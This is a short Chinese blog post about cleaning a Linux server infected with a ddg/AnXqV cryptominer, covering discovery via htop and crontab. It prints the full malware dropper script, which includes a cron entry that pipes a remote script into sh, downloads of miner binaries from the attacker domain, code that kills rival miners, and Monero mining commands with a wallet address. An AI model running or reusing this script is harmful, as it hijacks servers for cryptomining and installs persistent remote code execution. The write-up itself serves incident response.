• 查杀病毒实战----------------》ddg.223 and AnXQV

    htop 发现导常:

    接着发现可疑进程:

    首先检测crontab,发现问题:

    # crontab -l
*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

    注释掉计划任务!!!

    # crontab -l
#*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

    把把脚本下载下来:

    http://www.bdyutiudwj.com/i.sh?1

    查看一下内容:

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.223" ]; then
    curl -fsSL http://www.bdyutiudwj.com/ddg.$(uname -m) -o /tmp/ddg.223
fi
chmod +x /tmp/ddg.223 && /tmp/ddg.223

CleanTail()
{
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}

DoYam()
{
    if [ ! -f "/tmp/AnXqV.yam" ]; then
        curl -fsSL http://www.bdyutiudwj.com/yam -o /tmp/AnXqV.yam
    fi
    chmod +x /tmp/AnXqV.yam
    /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
}

DoMiner()
{
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.bdyutiudwj.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
}

DoMinerNoAes()
{
    if [ ! -f "/tmp/AnXqV.noaes" ]; then
        curl -fsSL http://www.bdyutiudwj.com/minerd.noaes -o /tmp/AnXqV.noaes
    fi
    chmod +x /tmp/AnXqV.noaes
    /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
}

ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam
ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    # tree /var/spool/cron/
/var/spool/cron/
├── crontabs
│   └── root
└── root
#查看内容并注掉
cat /var/spool/cron/root /var/spool/cron/crontabs/root 
#*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh
#*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh?1 | sh

    最后杀掉可疑进程,问题解决
  • 相关阅读:
    css js 解除网页无法选择进而复制的限制,bd文库无法复制
    Git命令简记
    DDD基本概念-未完成
    多线程隙-IO模型(BIO、NIO、AIO)
    RabbitMQ笔记-保证消息队列高可用
    关于fiddler手机抓包
    spring控制反转是谁在何时何地反转给谁?依赖注入??
    Cookie、Session、Token的区别
    详解Redis中两种持久化机制RDB和AOF
    Java中线程池的抛出策略、阻塞队列、内存溢出
  • 原文地址:https://www.cnblogs.com/bass6/p/6487253.html
Copyright © 2020-2023  润新知